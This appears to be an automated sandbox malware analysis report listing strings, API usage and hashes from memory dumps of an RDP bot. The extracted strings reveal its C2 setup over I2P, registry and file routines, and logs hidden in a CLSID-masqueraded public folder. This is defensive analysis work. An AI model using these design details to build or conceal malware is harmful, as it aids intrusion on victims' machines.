1325->1327 1336 7ffe11eca18d-7ffe11eca1a8 call 7ffe11ec9dc2 1326->1336 1337 7ffe11eca077-7ffe11eca093 call 7ffe11ec9dc2 1326->1337 1327->1326 1328->1316 1338 7ffe11eca136-7ffe11eca13b 1329->1338 1339 7ffe11eca16f-7ffe11eca174 1329->1339 1330->1320 1340 7ffe11eca153-7ffe11eca158 1330->1340 1331->1313 1333->1316 1334->1318 1335->1325 1336->1316 1337->1316 1345 7ffe11eca1fd-7ffe11eca217 call 7ffe11ec9dc2 1337->1345 1338->1316 1339->1316 1340->1316 1345->1332
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                                                                  • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
                                                                                                                  • API String ID: 3395718042-2735303109
                                                                                                                  • Opcode ID: 28aa5a620a821618e9e1eab76ce42311eeb29bae9038448bb8e226e1b3100159
                                                                                                                  • Instruction ID: 4aa0a46e6677fea29cdc8b815fb9d63845e619baee1eb55223f49ed9619553fd
                                                                                                                  • Opcode Fuzzy Hash: 28aa5a620a821618e9e1eab76ce42311eeb29bae9038448bb8e226e1b3100159
                                                                                                                  • Instruction Fuzzy Hash: 4E512B50E0CE8381FB2197E7AC813BB165CAF857E4FD411B6D90E472B2EE6DB9468341
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                  • API String ID: 1980715187-3890537267
                                                                                                                  • Opcode ID: 435f0e7a9ab592d34743d64c01d9f013227a1ed4134e646b68ad534058a57e85
                                                                                                                  • Instruction ID: e047fe73b5de9057a938616ecf7129f51b9079715c1e03c904f6626582c6100e
                                                                                                                  • Opcode Fuzzy Hash: 435f0e7a9ab592d34743d64c01d9f013227a1ed4134e646b68ad534058a57e85
                                                                                                                  • Instruction Fuzzy Hash: 9AA15360A0DF47C1FF789F02A440FF92668AF0076DE5420B2D91E466B5EE6DE985C742
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                  • API String ID: 1980715187-3890537267
                                                                                                                  • Opcode ID: b18f92a94391334b5021cc5a55a8855e150f120a01a416b053650ed8708d6e22
                                                                                                                  • Instruction ID: e060e8dda9d49340cab6081fdd8b5e8b9eaed876cc8892fbb95d3a863c118f3c
                                                                                                                  • Opcode Fuzzy Hash: b18f92a94391334b5021cc5a55a8855e150f120a01a416b053650ed8708d6e22
                                                                                                                  • Instruction Fuzzy Hash: 8FA18650B0DF4B89F660970AA9403F92150AF02F76F5421F3DA5E0A6B5EE6DED96C303
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                  • API String ID: 1980715187-3890537267
                                                                                                                  • Opcode ID: f0780e4458a1f16a4b0ae7c97537e6a3c9984223036dfcaa3b70bce945f15d85
                                                                                                                  • Instruction ID: 2b2d24ca67427b61bf3edd6790616c241fcdd63901799263c6f42f1cf9859b42
                                                                                                                  • Opcode Fuzzy Hash: f0780e4458a1f16a4b0ae7c97537e6a3c9984223036dfcaa3b70bce945f15d85
                                                                                                                  • Instruction Fuzzy Hash: 60A15A6190EF4B81FB60EB02AD103BC6251EF40764F5401B2DA1E06AF5EEEDB985C346
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                  • API String ID: 1980715187-3890537267
                                                                                                                  • Opcode ID: 52dd1e0f452b0a0a32c6dee82c88d7773d124347f03f581defefe5ba7e31293b
                                                                                                                  • Instruction ID: 9ab6b663ea93ee1ec43e5af97f8a8d957e6d017055d67726d12c4c4fc41cf364
                                                                                                                  • Opcode Fuzzy Hash: 52dd1e0f452b0a0a32c6dee82c88d7773d124347f03f581defefe5ba7e31293b
                                                                                                                  • Instruction Fuzzy Hash: 20A15363B0CF4BC5FA209B83A4407792252AF43F64F5400F3D95E466B1EEADB949D742
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                  • API String ID: 1980715187-3890537267
                                                                                                                  • Opcode ID: 6424f46c56584493deaf114f494463b6ad5cd0a7efb3682d434f95ee5198ee13
                                                                                                                  • Instruction ID: 68dbefb7494ca62704a83dcd72184fc2277537b0ea539140d1d0e698ce86b5dc
                                                                                                                  • Opcode Fuzzy Hash: 6424f46c56584493deaf114f494463b6ad5cd0a7efb3682d434f95ee5198ee13
                                                                                                                  • Instruction Fuzzy Hash: D3A15464D1CF0B99F7B19B92A84037E265D6F01368F5401BAC91E077B2EEADE985C302
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                  • API String ID: 1980715187-3890537267
                                                                                                                  • Opcode ID: 7f19a7410ae59509b384c64feabfbea1f96e87a3bd380099ac3d5f47d3dae185
                                                                                                                  • Instruction ID: 4d1fef247f26db6a57c20efbb0b68aee9de68f6d512ea7a0d2b93bd471fa6f2d
                                                                                                                  • Opcode Fuzzy Hash: 7f19a7410ae59509b384c64feabfbea1f96e87a3bd380099ac3d5f47d3dae185
                                                                                                                  • Instruction Fuzzy Hash: DAA13F65D0CF4B91FB20DBC2AC003BB625CAF14764F9451B2CA1E467B1EE6DFA858702
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorLastThread
                                                                                                                  • String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
                                                                                                                  • API String ID: 1689873465-2891999747
                                                                                                                  • Opcode ID: 69ff0dd040673d29dc0efb7132441b44c922c1686ba0aa4da5f9ac38d49a83f6
                                                                                                                  • Instruction ID: 3a628aa79b5d4280338f8a6b4f871deded79df985f9dde14bc6fd8820dbf1761
                                                                                                                  • Opcode Fuzzy Hash: 69ff0dd040673d29dc0efb7132441b44c922c1686ba0aa4da5f9ac38d49a83f6
                                                                                                                  • Instruction Fuzzy Hash: 35914A61B0DE47C5FB618BD6A8803B422A1AF96F78F5402F7D85D4A2F2EF2CA545C341
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno$fclosefopenfwrite
                                                                                                                  • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                                                                                                  • API String ID: 608220805-544371937
                                                                                                                  • Opcode ID: 6bb662439ff0a9edd6456aef351c72a4391720da368e4311bf0ea69c9534dbcd
                                                                                                                  • Instruction ID: 5fcbbafbe14f3cb32e3b2491a1346d07a5a76f7fc7b54925339b16bd3e366cbf
                                                                                                                  • Opcode Fuzzy Hash: 6bb662439ff0a9edd6456aef351c72a4391720da368e4311bf0ea69c9534dbcd
                                                                                                                  • Instruction Fuzzy Hash: BC516671B0D68289FB10FF559910ABCA361AF457A4FC80133E91E47791EEADE906C320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                                                                                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                                                                  • API String ID: 1104438493-1059260517
                                                                                                                  • Opcode ID: 04542ae5c1f5461983f5d04dea1494922f9644e84bc8b476523380548322e74a
                                                                                                                  • Instruction ID: 48018174b20294888601b31c87b85573106c88ce568d2150d80954bb23a6a2a5
                                                                                                                  • Opcode Fuzzy Hash: 04542ae5c1f5461983f5d04dea1494922f9644e84bc8b476523380548322e74a
                                                                                                                  • Instruction Fuzzy Hash: 84716B12B0CE43C6FA615B97A4843B91252AFA7F74F5810F3D94E472B2EE2CE945C341
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                                                                                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                                                                  • API String ID: 1104438493-1059260517
                                                                                                                  • Opcode ID: 723e7e1c9b4e9d2c0e6677df24c73e88ba84a21a4c6914f4dc0e9c11adef5464
                                                                                                                  • Instruction ID: dbb44ee059780844e7c10c6ee606fce505ca30cee32228a6c878e8fc703e0251
                                                                                                                  • Opcode Fuzzy Hash: 723e7e1c9b4e9d2c0e6677df24c73e88ba84a21a4c6914f4dc0e9c11adef5464
                                                                                                                  • Instruction Fuzzy Hash: 09717D11B0CE8381FB205B97EC413BB56A8AF88765F9411B2D90E167F6DE2DF885C701
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
                                                                                                                  • String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
                                                                                                                  • API String ID: 3216678114-1460613360
                                                                                                                  • Opcode ID: 8b7dcbde98ae6afe88b0399af49ac6b996af1102512ce647207782932fe25cf1
                                                                                                                  • Instruction ID: e5d590a289226c908e8201a9f9c038965e5fad8dfc112d7f1ada2dba4095444d
                                                                                                                  • Opcode Fuzzy Hash: 8b7dcbde98ae6afe88b0399af49ac6b996af1102512ce647207782932fe25cf1
                                                                                                                  • Instruction Fuzzy Hash: 73511B64A0C79391FB20FF15A990BBDD664AF14764FD48433C90E0B396DEEEA985C321
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
                                                                                                                  • String ID: %TEMP%$(package != NULL)$(target != NULL)$C:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
                                                                                                                  • API String ID: 3066828623-21863935
                                                                                                                  • Opcode ID: 450b15a3d360a3442c0a958e84f1eddc94a1de40b1d6f94e9d44005796073302
                                                                                                                  • Instruction ID: 78090fe4952a62adf11f8417be799ff8492ad02a45845198cdcff86aca8abb0b
                                                                                                                  • Opcode Fuzzy Hash: 450b15a3d360a3442c0a958e84f1eddc94a1de40b1d6f94e9d44005796073302
                                                                                                                  • Instruction Fuzzy Hash: 99818B71A0868381FB11EF55E850BADA760AB443A4FC41033EE4D476D9DEFDE509C720
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
